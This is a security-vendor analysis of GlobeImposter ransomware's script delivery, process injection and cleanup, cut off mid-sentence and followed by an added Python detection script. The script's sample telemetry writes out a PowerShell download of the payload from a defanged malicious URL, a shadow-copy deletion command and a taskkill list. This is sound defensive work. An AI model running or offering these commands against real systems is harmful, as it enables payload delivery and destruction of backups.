An analysis of GlobeImposter Ransomware by Quick Heal Security Labs
Credit to Author: Quick Heal Security Labs | Date: Fri, 11 Aug 2017 06:34:51 +0000
GlobeImposter Ransomware has been increasingly active recently and has been observed appending different suffixes to the files it encrypts. Patterns observed include three random digits such as “.492”, “.490”, “.725”, “.726” and “.707”; random alphanumeric strings such as “.p1crypt”, “.A1crypt”, “.BRT92” and “.mtk118”; and word suffixes such as “.OCEAN”, “.SEA”, “.ROSE”, “.ASTRA” and “.DECODED”.

Earlier, GlobeImposter relied only on compromised RDP (Remote Desktop Connection) access to get onto a machine, but for the last couple of weeks we have observed it being delivered through malspam campaigns as well. Most script files seen in earlier malspam campaigns used multiple URLs as fallbacks to download the payload through Windows Script Host (WSH) and/or used PowerShell for evasion. GlobeImposter has propagated largely through the Blank Slate malspam campaign, mostly featuring JS/VBS script files. Read more on the Blank Slate malspam campaign.

We have observed several domains being used to deliver the malicious payload through the script files received by Quick Heal Security Labs. The payload hosted on these domains varies and also appears to encrypt files with different suffixes. The domains found in the script files are either compromised or newly registered for malicious purposes.

We debugged heavily obfuscated malicious JS files to understand the code used for payload delivery. Below is one of the script files, “31408.js”, received from the malspam campaign.

Fig 1. Obfuscated JavaScript file

Interestingly, the script has a fail-safe: an exception handler. The script first uses Windows Script Host to deliver the payload; if that raises an exception for any reason, the handler is invoked and executes PowerShell to deliver the ransomware payload instead.

Fig 2. De-obfuscated JavaScript code

The de-obfuscated code contains a single domain (marked in red in figure 2) that is shared by the main code, which fetches the payload with an HTTP GET request, and the exception path, which delivers it via PowerShell. Quick Heal Browsing Protection blocks the malicious URL and prevents the download of the payload.

The WSH path downloads the payload to C:\Users\<user>\AppData\Roaming\Microsoft\Windows\Templates\{6_RandomNumbers}.exe, while the exception path downloads it to C:\Users\<user>\AppData\Roamingrnd.exe.

The PowerShell code also contains a minor mistake. Its target download location is ‘%appdata%rnd.exe’ where ‘%appdata%\rnd.exe’ was intended. Because the path separator is missing, the payload is written to “C:\Users\<user>\AppData\Roamingrnd.exe”, beside the Roaming folder rather than inside it, and the file is named Roamingrnd.exe instead of rnd.exe.

When we executed “31408.js”, the GlobeImposter payload was downloaded from “hxxp://foolerpolwer.info/admin.php?f=3”. In our test environment the downloaded file was named 725947.exe. As seen in the image below, the script issued an HTTP request to the malicious domain and received a PE file (executable) with the filename “3”. The file is then renamed and moved to the location above, with the new name generated by the Math.random() function as seen in fig 2.

Fig 4. HTTP request/response for payload

When the dropped payload is executed, it de-obfuscates the malicious code from its resource section in memory; this de-obfuscated code is what carries out the ransomware activity. The payload creates a child process with the CREATE_SUSPENDED flag, writes the de-obfuscated code into it with WriteProcessMemory and then resumes the thread/process.

Fig 5. Creation of child process with CREATE_SUSPENDED flag

Before the encryption activity begins, the injected process runs a routine that terminates the processes outlook, ssms, postgre, 1c, SQL, excel and word using taskkill. Terminating these applications releases the files they hold open, giving the payload access to more files to encrypt.

Fig 6. De-obfuscated PE file in buffer address dump

To explain the malware execution, we have put together a process tree for the GlobeImposter payload after execution. As mentioned earlier, the script downloads the payload, which in turn invokes a child process.

Fig 7. GlobeImposter execution process tree

The child process also drops a batch file that is executed after the encryption activity is completed. The batch file observed in our test environment, “__t8D.tmp.bat”, is responsible for deleting Volume Shadow Copies, the Remote Desktop information stored in the system registry and the file at %UserProfile%\Documents\Default.rdp. The…
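Hunting for this chain in endpoint telemetry, as an added example that is not part of the Quick Heal write-up: the Python below classifies constructed, Sysmon-style process- and file-creation records against the delivery stage described above (the six-digit payload under Templates, the PowerShell fallback and its mis-pathed Roamingrnd.exe), the pre-encryption taskkill list and the cleanup batch file. The field names (Image, ParentImage, CommandLine, TargetFilename), the sample host paths, the batch file's directory, the PowerShell download command line and the `vssadmin delete shadows` pattern standing in for “deleting Volume shadow copies” are assumptions; the write-up names the outcomes, not the exact commands, and does not name the registry keys the batch file clears, so that part of the cleanup is not modelled.

```python
"""Hunt for the GlobeImposter execution chain in process/file-creation telemetry.

Added example, not Quick Heal's code. Events are constructed Sysmon-style dicts
(Image, ParentImage, CommandLine, TargetFilename); the vssadmin pattern is an
assumption about how the cleanup .bat deletes shadow copies.
"""
import re
from typing import Dict, Iterable, List, Set

Event = Dict[str, str]

# Stage 1 (delivery): WSH writes {6 digits from Math.random()}.exe under
# ...\Windows\Templates; the PowerShell fallback concatenates %appdata% and
# "rnd.exe" without a separator, so the file lands beside the Roaming folder.
TEMPLATES_DROP = re.compile(
    r"\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\\d{6}\.exe$", re.I)
ROAMINGRND_DROP = re.compile(r"\\AppData\\Roamingrnd\.exe\b", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Stage 2 (pre-encryption): process names the payload hands to taskkill.
KILL_TARGETS = ("outlook", "ssms", "postgre", "1c", "sql", "excel", "word")
TASKKILL_IMAGE = re.compile(r'/im\s+"?([^\s"]+)', re.I)
# Stage 3 (cleanup .bat run after encryption).
TMP_BAT = re.compile(r"\.tmp\.bat\b", re.I)
SHADOW_DELETE = re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I)  # assumed command
DEFAULT_RDP = re.compile(r"\\Documents\\Default\.rdp\b", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev: Event) -> List[str]:
    """Return the stage indicators one event matches; [] for benign events."""
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd, target = ev.get("CommandLine", ""), ev.get("TargetFilename", "")
    hits: List[str] = []
    if image in SCRIPT_HOSTS and TEMPLATES_DROP.search(target):
        hits.append("stage1:wsh_writes_templates_payload")
    if parent in SCRIPT_HOSTS and TEMPLATES_DROP.search(ev.get("Image", "")):
        hits.append("stage1:templates_payload_executed")
    if parent in SCRIPT_HOSTS and image == "powershell.exe":
        hits.append("stage1:wsh_spawns_powershell_fallback")
    if ROAMINGRND_DROP.search(target) or ROAMINGRND_DROP.search(cmd):
        hits.append("stage1:roamingrnd_path_bug")
    if image == "taskkill.exe":
        # Prefix-match the /im arguments so "sql*" or "1cv8.exe" count but
        # an unrelated "taskkill /im notepad.exe" does not.
        named = sorted({t for arg in TASKKILL_IMAGE.findall(cmd)
                        for t in KILL_TARGETS if arg.lower().startswith(t)})
        if named:
            hits.append("stage2:taskkill_document_apps:" + ",".join(named))
    if image == "cmd.exe" and TMP_BAT.search(cmd):
        hits.append("stage3:tmp_bat_launched")
    if SHADOW_DELETE.search(cmd):
        hits.append("stage3:shadow_copies_deleted")
    if DEFAULT_RDP.search(target) or DEFAULT_RDP.search(cmd):
        hits.append("stage3:default_rdp_deleted")
    return hits

def hunt(events: Iterable[Event]) -> List[str]:
    """All indicators across an event stream, in event order."""
    return [h for ev in events for h in classify(ev)]

def stages_present(events: Iterable[Event]) -> Set[int]:
    return {int(h[5]) for h in hunt(events)}

def looks_like_globeimposter(events: Iterable[Event]) -> bool:
    """Alert only when delivery, pre-encryption kills and cleanup all appear."""
    return stages_present(events) == {1, 2, 3}


PAYLOAD = r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Templates\725947.exe"
WSCRIPT, CMD = r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS: List[Event] = [  # constructed, not captured telemetry
    {"Image": WSCRIPT, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'wscript.exe "C:\Users\victim\Downloads\31408.js"', "TargetFilename": ""},
    {"Image": WSCRIPT, "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "",
     "TargetFilename": PAYLOAD},
    {"Image": PAYLOAD, "ParentImage": WSCRIPT, "CommandLine": PAYLOAD, "TargetFilename": ""},
    {"Image": r"C:\Windows\System32\taskkill.exe", "ParentImage": PAYLOAD, "TargetFilename": "",
     "CommandLine": "taskkill /f /im outlook* /im ssms* /im postgre* /im 1c* /im sql* /im excel* /im word*"},
    {"Image": CMD, "ParentImage": PAYLOAD, "TargetFilename": "",  # .bat directory assumed
     "CommandLine": r'cmd.exe /c "C:\Users\victim\AppData\Local\Temp\__t8D.tmp.bat"'},
    {"Image": r"C:\Windows\System32\vssadmin.exe", "ParentImage": CMD, "TargetFilename": "",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"Image": CMD, "ParentImage": PAYLOAD, "CommandLine": "",
     "TargetFilename": r"C:\Users\victim\Documents\Default.rdp"},
]
# The exception-handler path: WSH spawns PowerShell, which writes Roamingrnd.exe.
FALLBACK_EVENT: Event = {  # download command line is constructed
    "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": WSCRIPT,
    "CommandLine": "powershell -c \"(New-Object Net.WebClient).DownloadFile("
                   "'hxxp://foolerpolwer.info/admin.php?f=3','C:\\Users\\victim\\AppData\\Roamingrnd.exe')\"",
    "TargetFilename": "",
}

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS) + classify(FALLBACK_EVENT):
        print(hit)
    print("chain:", looks_like_globeimposter(SAMPLE_EVENTS))
```

Requiring all three stages before alerting keeps a lone shadow-copy deletion, which backup tooling also issues, from firing on its own, while the Roamingrnd.exe and Templates\{6 digits}.exe indicators are specific enough to hunt for individually: a legitimate process has little reason to write an executable directly under AppData or into the Templates folder.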